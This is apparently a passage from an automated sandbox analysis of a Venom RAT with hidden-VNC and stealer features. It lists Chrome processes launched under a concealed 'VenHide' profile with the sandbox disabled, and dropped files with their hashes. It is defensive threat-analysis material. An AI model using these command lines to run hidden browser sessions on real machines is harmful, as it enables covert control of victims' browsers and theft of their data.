                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --no-appcompat-clear --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4540,i,18349317215823796998,4134242961614715135,262144 --variations-seed-version --mojo-platform-channel-handle=4356 /prefetch:1
                                                  4⤵
                                                    PID:6124
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --no-appcompat-clear --field-trial-handle=4604,i,18349317215823796998,4134242961614715135,262144 --variations-seed-version --mojo-platform-channel-handle=4436 /prefetch:8
                                                    4⤵
                                                      PID:6132
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --no-appcompat-clear --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4704,i,18349317215823796998,4134242961614715135,262144 --variations-seed-version --mojo-platform-channel-handle=4700 /prefetch:1
                                                      4⤵
                                                        PID:6140
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --no-appcompat-clear --field-trial-handle=4644,i,18349317215823796998,4134242961614715135,262144 --variations-seed-version --mojo-platform-channel-handle=4488 /prefetch:8
                                                        4⤵
                                                          PID:5388
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --no-appcompat-clear --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=4392,i,18349317215823796998,4134242961614715135,262144 --variations-seed-version --mojo-platform-channel-handle=4356 /prefetch:1
                                                          4⤵
                                                            PID:5636
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --no-appcompat-clear --field-trial-handle=4640,i,18349317215823796998,4134242961614715135,262144 --variations-seed-version --mojo-platform-channel-handle=4764 /prefetch:8
                                                            4⤵
                                                              PID:5648
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --no-appcompat-clear --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=4708,i,18349317215823796998,4134242961614715135,262144 --variations-seed-version --mojo-platform-channel-handle=4508 /prefetch:1
                                                              4⤵
                                                                PID:5228
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --no-appcompat-clear --field-trial-handle=4384,i,18349317215823796998,4134242961614715135,262144 --variations-seed-version --mojo-platform-channel-handle=4552 /prefetch:8
                                                                4⤵
                                                                  PID:5368
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --no-appcompat-clear --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=4536,i,18349317215823796998,4134242961614715135,262144 --variations-seed-version --mojo-platform-channel-handle=2852 /prefetch:1
                                                                  4⤵
                                                                    PID:5656
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --extension-process --no-appcompat-clear --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=4720,i,18349317215823796998,4134242961614715135,262144 --variations-seed-version --mojo-platform-channel-handle=3260 /prefetch:2
                                                                    4⤵
                                                                      PID:5196
                                                              • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                1⤵
                                                                • Modifies registry class
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:2056
                                                              • C:\Windows\system32\BackgroundTransferHost.exe
                                                                "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
                                                                1⤵
                                                                • Modifies registry class
                                                                PID:2348
                                                              • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                1⤵
                                                                  PID:1724
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                  1⤵
                                                                    PID:5900

                                                                  Network

                                                                  MITRE ATT&CK Enterprise v15

                                                                  Replay Monitor

                                                                  Loading Replay Monitor...

                                                                  Downloads

                                                                  • C:\Program Files\Google\Chrome\Application\SetupMetrics\20250127233035.pma

                                                                    Filesize

                                                                    520B

                                                                    MD5

                                                                    d7bdecbddac6262e516e22a4d6f24f0b

                                                                    SHA1

                                                                    1a633ee43641fa78fbe959d13fa18654fd4a90be

                                                                    SHA256

                                                                    db3be7c6d81b2387c39b32d15c096173022cccee1015571dd3e09f2a69b508a9

                                                                    SHA512

                                                                    1e72db18de776fe264db3052ce9a842c9766a720a9119fc6605f795c36d4c7bf8f77680c5564f36e591368ccd354104a7412f267c4157f04c4926bce51aeeaa1

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\VenHide\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.86.1_0\_locales\en_CA\messages.json

                                                                    Filesize

                                                                    851B

                                                                    MD5

                                                                    07ffbe5f24ca348723ff8c6c488abfb8

                                                                    SHA1

                                                                    6dc2851e39b2ee38f88cf5c35a90171dbea5b690

                                                                    SHA256

                                                                    6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

                                                                    SHA512

                                                                    7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\VenHide\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.86.1_0\dasherSettingSchema.json

                                                                    Filesize

                                                                    854B

                                                                    MD5

                                                                    4ec1df2da46182103d2ffc3b92d20ca5

                                                                    SHA1

                                                                    fb9d1ba3710cf31a87165317c6edc110e98994ce

                                                                    SHA256

                                                                    6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

                                                                    SHA512

                                                                    939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\VenHide\Default\Local Storage\leveldb\CURRENT

                                                                    Filesize

                                                                    16B

                                                                    MD5

                                                                    46295cac801e5d4857d09837238a6394

                                                                    SHA1

                                                                    44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                    SHA256

                                                                    0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                    SHA512

                                                                    8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\VenHide\Default\Local Storage\leveldb\MANIFEST-000001

                                                                    Filesize

                                                                    41B

                                                                    MD5

                                                                    5af87dfd673ba2115e2fcf5cfdb727ab

                                                                    SHA1

                                                                    d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                    SHA256

                                                                    f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                    SHA512

                                                                    de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\VenHide\Default\Network\SCT Auditing Pending Reports

                                                                    Filesize

                                                                    2B

                                                                    MD5

                                                                    d751713988987e9331980363e24189ce

                                                                    SHA1

                                                                    97d170e1550eee4afc0af065b78cda302a97674c

                                                                    SHA256

                                                                    4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                    SHA512

                                                                    b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\VenHide\Default\Preferences

                                                                    Filesize

                                                                    8KB

                                                                    MD5

                                                                    b7f2c8bf728e3ad1f7c84b7369bf5c10

                                                                    SHA1

                                                                    9bfa2d1e75be713e41e0f5fd30518983d36f6439

                                                                    SHA256

                                                                    59e687002252a1d5f10bb9f36c4b2864e717741afae3f3cf8e8797d792d3f50f

                                                                    SHA512

                                                                    10739afb5b04eefdeef2ddcb355f396a7afe81dcfa845fa606268fe523644de1becdf5e246cbf53fb6dc27a56eea2e8dc61bc3904b0b1bd9d0b185e799599ff6

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\VenHide\Default\Preferences~RFe59c123.TMP

                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    557a5043e48730fcc60150bb7549ed93

                                                                    SHA1

                                                                    e3aab67e993e4703a0da892a7933e9a83d3bc756

                                                                    SHA256

                                                                    f6cd1493f40176dd6b670fa899066fd9b3b476e9fd38065e1707c2cb7f219efe

                                                                    SHA512

                                                                    c375e655d0f3fa166b324f915b872147d57edb0861478678c7fac0370c33195b32873bb1b86565ae7ab83d0e2d34b8fce95cbf9d52af87f49a46edc41a81a450

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\VenHide\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\32.png

                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    44188def4e01c25516ca590c90499b2f

                                                                    SHA1

                                                                    0a9258ac71dbd02eb2e5a592365c9e8a3744d3c7

                                                                    SHA256

                                                                    be3a2fe70a27da2e9836e8b96a0dcfdd980702f69124f984f82de2b8699fe977

                                                                    SHA512

                                                                    f202686756dd603d4d98b36421e2613003279601328aae2214ffa3226a6a7c6102703808877818a989f2927677210dbb7bfa49ccd870771b399abdfa2431dca8

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\VenHide\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\48.png

                                                                    Filesize

                                                                    2KB

                                                                    MD5

                                                                    b87bfabaff9e7370835ea8790c87409b

                                                                    SHA1

                                                                    d9641aa79839fa5067ee9054cd61e0eecccfc7ec

                                                                    SHA256

                                                                    d67823095d8a91a0d4638ba75216c2f4b467f4fca5a56c4e45e88091b17dfdc5

                                                                    SHA512

                                                                    d8e3e59056076919afc7b5640d4f5964abbaac8537bb547da68f7a91c314a72615059024fa6e517134da81a38d4701138f50e37bf99a37ac3353ca5d92ed162e

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\VenHide\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\64.png

                                                                    Filesize

                                                                    3KB

                                                                    MD5

                                                                    72af0c1352184e984612088a6df54e53

                                                                    SHA1

                                                                    12faf6f7b28cc2d4be9d639a770e54d895d6fe58

                                                                    SHA256

                                                                    e036bcb9f333d3d7e12492247e02fc6d599e12c42cc008fcbbac37def93ca0da

                                                                    SHA512

                                                                    8dfed220c6391592aa1bc06000548f1f18ce1e6b47b6e3b47f11185cb0d0c48f961c82c6abb598ee1dcde7ed87c59026cd282ee56f5e0dd1f48ec89a207f4623

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\VenHide\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\32.png

                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    cfd1c4fa219ea739c219d4fb8c9ccf8d

                                                                    SHA1

                                                                    1bd9c4a0c08a594966efe48802af8cdd46aa724c

                                                                    SHA256

                                                                    36670568a87c7b3cd1a4448ffe5bde9b6fd3d65b58e6dca38cc4ea2e9e8c11b3

                                                                    SHA512

                                                                    59918179057447aa18668abbdaacd11ee3f5e83c25a93f916a050a559ea1457d6ab61abd3db9def22b5214a1767911e9cf9fa8e638852032cca3696424c6a903

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\VenHide\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\48.png

                                                                    Filesize

                                                                    2KB

                                                                    MD5

                                                                    f484337ddad3b425b5788e5ce7082bc8

                                                                    SHA1

                                                                    79c7e4c0202a06ef3a287cc76ea498fcf26009c2

                                                                    SHA256

                                                                    fa58e3209e408e4f0d60a7ed330d6f62884ccf9b593e37cde03e7916c116dd1f

                                                                    SHA512

                                                                    518a8e3d53fe86dc714a59cc70f8f0c44396d7569d25837c1cfe6212a10204080e0c4d19c43729f1815093af9f075693decbb9496700a2f00bd57dd3ed0b0a3c

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\VenHide\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\64.png

                                                                    Filesize

                                                                    2KB

                                                                    MD5

                                                                    9ca95e4d4941acee74cd1bef23eaba35

                                                                    SHA1

                                                                    1717e5136bf97a89b5dca5178f4d4d320b21fb48

                                                                    SHA256

                                                                    80c1e2f4d89d5266f82dc0295f232eda894812820c5c625a036adf980536e5a8

                                                                    SHA512

                                                                    9fb11e36e626b0d9eb43548ba0e90cda27e70d027361c52437f01287e94f07d07da01a385ee2466963e305516f56e37020644ce03d1132322d7e796440c633b5

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\VenHide\Default\Web Applications\Temp\scoped_dir1092_871206038\Icons\128.png

                                                                    Filesize

                                                                    5KB

                                                                    MD5

                                                                    c592b8809b071c071577fff963bd1ad5

                                                                    SHA1

                                                                    f628a6edd48da4aebdfdc05ee3ce852b27706cee

                                                                    SHA256

                                                                    8a9434f0ede8c6edf65f8d5750852be574847a62a4534e1b6b372078463b6d04

                                                                    SHA512

                                                                    418f074fe6b91e4393bc670a75d26db28ddfa370e3b33c17db2a402dd008175be910c3fe9714051d55c13fb28d3901fc6e7e81f73587144d053d8b25bf9c8c90

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\VenHide\GraphiteDawnCache\data_0

                                                                    Filesize

                                                                    8KB

                                                                    MD5

                                                                    cf89d16bb9107c631daabf0c0ee58efb

                                                                    SHA1

                                                                    3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

                                                                    SHA256

                                                                    d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

                                                                    SHA512

                                                                    8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\VenHide\GraphiteDawnCache\data_1

                                                                    Filesize

                                                                    264KB

                                                                    MD5

                                                                    d0d388f3865d0523e451d6ba0be34cc4

                                                                    SHA1

                                                                    8571c6a52aacc2747c048e3419e5657b74612995

                                                                    SHA256

                                                                    902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b

                                                                    SHA512

                                                                    376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\VenHide\GraphiteDawnCache\data_2

                                                                    Filesize

                                                                    8KB

                                                                    MD5

                                                                    0962291d6d367570bee5454721c17e11

                                                                    SHA1

                                                                    59d10a893ef321a706a9255176761366115bedcb

                                                                    SHA256

                                                                    ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

                                                                    SHA512

                                                                    f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\VenHide\GraphiteDawnCache\data_3

                                                                    Filesize

                                                                    8KB

                                                                    MD5

                                                                    41876349cb12d6db992f1309f22df3f0

                                                                    SHA1

                                                                    5cf26b3420fc0302cd0a71e8d029739b8765be27

                                                                    SHA256

                                                                    e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

                                                                    SHA512

                                                                    e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\VenHide\Local State

                                                                    Filesize

                                                                    121KB

                                                                    MD5

                                                                    00ad5b53ea06095c1863d4f3e5670239

                                                                    SHA1

                                                                    cd8e664fea7d2c016dd44dd51603a9efe5ee068a

                                                                    SHA256

                                                                    24ec7e3aa4b245e684000fbb36aeb218f93e01efe2e32aa8c4b05006fc83643e

                                                                    SHA512

                                                                    9a6d6065d2e03c3fb2db9b3bef1450ca83dd338b96ed98e334ecc7e3b23ccc54574930e6f4fe23d7c0da5992dccfbf920c5cc8f4a2d5cbe0daa452e5b443792f

                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\VenHide\Local State~RFe59c0f5.TMP

                                                                    Filesize

                                                                    967B

                                                                    MD5

                                                                    bbdf33dd415b3f72dddda432d76f4a4e

                                                                    SHA1

                                                                    3b271d1572690d35d0e7f1072695ec04ea0e94c1

                                                                    SHA256

                                                                    7de4dd43d695fe3ac79f40631729c199361021f14dd9bb3f38cba9d0a8db31ca

                                                                    SHA512

                                                                    bd249f009e176a143400c73e660a551c2e69f9e4ee51d0cb4df5a65bbdaf1b3cf5e73ed6844db509683b15529d60a966bde850ea7693684b261d98630d6013c6

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                    Filesize

                                                                    3KB

                                                                    MD5

                                                                    aa0a32b11dca7b04f4cc5fe8c55cb357

                                                                    SHA1

                                                                    00e354fd0754a7d721a270cdc08f970b9a3f6605

                                                                    SHA256

                                                                    e336a593bd31921c46757a88a99759f6a33854d0c8b854c0c8f118e5cede1ea1

                                                                    SHA512

                                                                    1db91d3540da2c7eb4e151d698f3a9c1d2caed3161c41f1c2c73781a65e9dfc818902f0220c0aa9fc2c617d4851f23f4a576c4e5fe0f40ec78e9ed01c8ad8b30

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

                                                                    Filesize

                                                                    14KB

                                                                    MD5

                                                                    152f34a245af2851ee47a6f1006a7ea5

                                                                    SHA1

                                                                    11cf3b6f9e217b68774df10cd27c8f323daae6b1

                                                                    SHA256

                                                                    55324dc4db0780976b398951cb6709d1883fcdd3fdef12b563ea732b15d94d04

                                                                    SHA512

                                                                    49c43126a65eb95441d3e0414beb62ba3af6b3409b928b848292c288dad347015654782b255545ab71935c0f8d0bdad1c6bf0b1f64fd7b737654dc9cf5015dce

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

                                                                    Filesize

                                                                    14KB

                                                                    MD5

                                                                    c7515540c9dce32f78436fba694465d7

                                                                    SHA1

                                                                    a35488a51dd4eb80137e48d1a6813a1bacb01af4

                                                                    SHA256

                                                                    fe6f137ad33799553ea3012e3cdb1673571c174abfad95237afe751b19d879f5

                                                                    SHA512

                                                                    149bd60bc2eb430957854e11b40e7c8308293e8df244ff065cd1c06f537ad763d3f1f0bd7bb2a09278f6eeddab274a105e704b2fca95b76cf4f8c9ecd4862983

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    d48626a5f1691b863e62c95b358cecb9

                                                                    SHA1

                                                                    f89d38a2eb7d6dc32e12b9d9fe03421cda76f513

                                                                    SHA256

                                                                    9155f185376970958a02ee7e9e94111677850587a2ffe3536ceb68e8bf452951

                                                                    SHA512

                                                                    4ff5dff3b76ab81b0a310fb6be33c3fa73f834f98dcf83e3399876d07289267d091d4b5e0b4eeba9fea71ce1f2740521f263b5dec16394e7297ee376c117d464

                                                                  • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\bc823f4e-638f-4b80-a816-aad539ef8182.down_data

                                                                    Filesize

                                                                    555KB

                                                                    MD5

                                                                    5683c0028832cae4ef93ca39c8ac5029

                                                                    SHA1

                                                                    248755e4e1db552e0b6f8651b04ca6d1b31a86fb

                                                                    SHA256

                                                                    855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

                                                                    SHA512

                                                                    aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

                                                                  • C:\Users\Admin\AppData\Local\Server\Venom_RAT_+_HVNC_+_Steale_Url_hfvp5p1rhhwhiply0vdltrgybx1zwz4h\6.0.3.1\user.config

                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    ec49b7f5618d420d4c61a527d52c2638

                                                                    SHA1

                                                                    4c627db09339ea9d8266671a866140c5c9377c89

                                                                    SHA256

                                                                    1e5fc255b1d6ff6b9fcb242f9aade5db7d5ce869a7bad4a216cf92c90f239def

                                                                    SHA512

                                                                    d33bbc0e55aa55a52b12a476d570bc2f2bb649313d416d94cd7bf73c0e76bdbf016b8cecf2eb3aaafb490e36238a8bec3e41e88201b65d032daaed757ddabd6c

                                                                  • C:\Users\Admin\AppData\Local\Server\Venom_RAT_+_HVNC_+_Steale_Url_hfvp5p1rhhwhiply0vdltrgybx1zwz4h\6.0.3.1\user.config

                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    3fb8d2a2cd510948957ef43af5de1a6a

                                                                    SHA1

                                                                    165c56b69c45db04546436b8cfcd21bf543fe1e3

                                                                    SHA256

                                                                    095a2b7ce003847ea27f3eb98eca1c5bf9098c194c137c550bed549fe8d46306

                                                                    SHA512

                                                                    ddf025953f0487612cab831866ce03285aa810a406d0a92d4491a2d26c7eaba2c4108c230309732a7ab6184c1578419164afe2fdc8e0179d8584bfbc7e75f1c6

                                                                  • C:\Users\Admin\AppData\Local\Temp\5eb71084-a05b-4203-af80-cd02175ebd87.tmp

                                                                    Filesize

                                                                    150KB

                                                                    MD5

                                                                    240cd355e89ec1f3566bb2ef1f361dad

                                                                    SHA1

                                                                    2ade60eb20f0fb16657a4fb024d207a931dc927f

                                                                    SHA256

                                                                    1f0388d23a4d8492e2f9839392b22a6957deae8750b60ff860ee939811594295

                                                                    SHA512

                                                                    961fe2017949d185761d8491ab4f7f2ec3b0562cfb6fef202c34d685a87f2ea032f53d653e4c1d492dff1fb43d738e7727985738c1a956a1a18aae77a3d7f3b6

                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q1f3yvjc.du1.ps1

                                                                    Filesize

                                                                    60B

                                                                    MD5

                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                    SHA1

                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                    SHA256

                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                    SHA512

                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                  • C:\Users\Admin\AppData\Local\Temp\chrome_installer.log

                                                                    Filesize

                                                                    8KB

                                                                    MD5

                                                                    ff7d3b36d9ada7bb4d9458e2ec14c983

                                                                    SHA1

                                                                    e54c22085346e8eb4b200057f1fde1608a0cb817

                                                                    SHA256

                                                                    528a0d91cc353b4a6ab3d96d85647c4346d1ba8fe2d57681a576095e6dd00d57

                                                                    SHA512

                                                                    07756dea49168240f27667459d4f5f678e1510a06789830f1cb32595c5a6dcba848cd63c074da3b3dd5f821cb94c28c132af579f4f3cbffd5605e751618e9a93

                                                                  • C:\Users\Admin\AppData\Local\Temp\scoped_dir1092_959937699\CRX_INSTALL\_locales\en_CA\messages.json

                                                                    Filesize

                                                                    711B

                                                                    MD5

                                                                    558659936250e03cc14b60ebf648aa09

                                                                    SHA1

                                                                    32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

                                                                    SHA256

                                                                    2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

                                                                    SHA512

                                                                    1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome (2).lnk

                                                                    Filesize

                                                                    2KB

                                                                    MD5

                                                                    cb27cf2f9064fc85b7d29f4fb9a970af

                                                                    SHA1

                                                                    39def4a750755a6cf7aebc4657e90ed69b17a9c6

                                                                    SHA256

                                                                    90dce5b8593ccf306dc1ea1299adc333634a09079708ac19bb3413374ed24320

                                                                    SHA512

                                                                    9d7e35d657ec5974a2e2ad4af37ba1227c646089d78cd13c877b19c3f012e8fcd18b6ed864c84f8c803c87829a7cbd45211b36eeca1c31007a0f306d365517d1

                                                                  • C:\Users\Admin\Desktop\Client.exe

                                                                    Filesize

                                                                    74KB

                                                                    MD5

                                                                    416ed186dc16916a088603f62d4d24dd

                                                                    SHA1

                                                                    ac4cd45a78390dcb1f3f27388dbdd31d1e1dd519

                                                                    SHA256

                                                                    12c1879c3465a7e16b88bc3c7e62f697cfc4e7400c18c0eca06b0146690b2b11

                                                                    SHA512

                                                                    3247e66dcb78b2beb7d25a9547f0aa516dae296410af54b9c84640195eb75da0569b745beeffa7921b460c92db03bd5cc83ef873160264e430df88e884cdb4b5

                                                                  • C:\Windows\SystemTemp\Crashpad\settings.dat

                                                                    Filesize

                                                                    40B

                                                                    MD5

                                                                    a5522917db02b5681c3f246fca6ceb6b

                                                                    SHA1

                                                                    ce316ba8e8fb7e3098fbcf47112ff696a648ddde

                                                                    SHA256

                                                                    26c0791112f05905e95ccfc191eba95158a8ed06bf4a74dadc2717fd3be5961c

                                                                    SHA512

                                                                    5888fe3c95a04234b33c72d0f936cd989034c7dc05a2e3c02e03797176329fd1cd18f5da4cdabd345861e2c061720e49b48c3ba475a46a89fa6493d074515cf2

                                                                  • memory/404-18-0x00007FFD24530000-0x00007FFD24FF2000-memory.dmp

                                                                    Filesize

                                                                    10.8MB

                                                                  • memory/404-22-0x00007FFD24530000-0x00007FFD24FF2000-memory.dmp

                                                                    Filesize

                                                                    10.8MB

                                                                  • memory/404-1-0x0000017F1E310000-0x0000017F1F144000-memory.dmp

                                                                    Filesize

                                                                    14.2MB

                                                                  • memory/404-2-0x0000017F3ABB0000-0x0000017F3BFB4000-memory.dmp

                                                                    Filesize

                                                                    20.0MB

                                                                  • memory/404-3-0x0000017F39CC0000-0x0000017F3A1D2000-memory.dmp

                                                                    Filesize

                                                                    5.1MB

                                                                  • memory/404-4-0x0000017F3A1E0000-0x0000017F3A432000-memory.dmp

                                                                    Filesize

                                                                    2.3MB

                                                                  • memory/404-65-0x0000017F3E5E0000-0x0000017F3E602000-memory.dmp

                                                                    Filesize

                                                                    136KB

                                                                  • memory/404-5-0x00007FFD24530000-0x00007FFD24FF2000-memory.dmp

                                                                    Filesize

                                                                    10.8MB

                                                                  • memory/404-6-0x0000017F39BC0000-0x0000017F39C98000-memory.dmp

                                                                    Filesize

                                                                    864KB

                                                                  • memory/404-7-0x0000017F396A0000-0x0000017F396F0000-memory.dmp

                                                                    Filesize

                                                                    320KB

